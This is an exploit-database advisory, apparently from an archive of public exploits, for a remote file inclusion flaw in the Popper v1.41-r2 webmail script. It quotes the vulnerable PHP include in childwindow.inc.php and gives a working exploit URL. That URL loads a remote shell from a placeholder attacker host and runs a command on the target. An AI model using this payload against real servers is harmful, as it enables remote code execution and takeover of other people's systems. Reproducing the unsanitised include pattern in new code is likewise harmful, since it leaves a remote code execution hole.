id: 820
date: 09/11/2006
title: Popper <= v1.41-r2 (form) Remote File Include Vulnerability
author: SHiKaA
cves: 

===========================================================
Popper <= v1.41-r2 (form) Remote File Include Vulnerability
===========================================================


#==============================================================================================
#Popper <= v1.41 (form) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://popper.ractive.ch/      
#                                                                      
#Version : v1.41                                             
#
#================================================================================================
#Bug in : childwindow.inc.php
#
#Vlu Code :
#--------------------------------
#
#     <?php include($form.".form.inc.php");?>
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/childwindow.inc.php?form=http://SHELLURL.COM?&cmd=id
#
#================================================================================================
#Discoverd By : SHiKaA
#
#GreetZ : CCtream - Cyper-worrier team
# Special Thx To : simoo
==================================================================================================



#  0day.today [2023-03-26]  #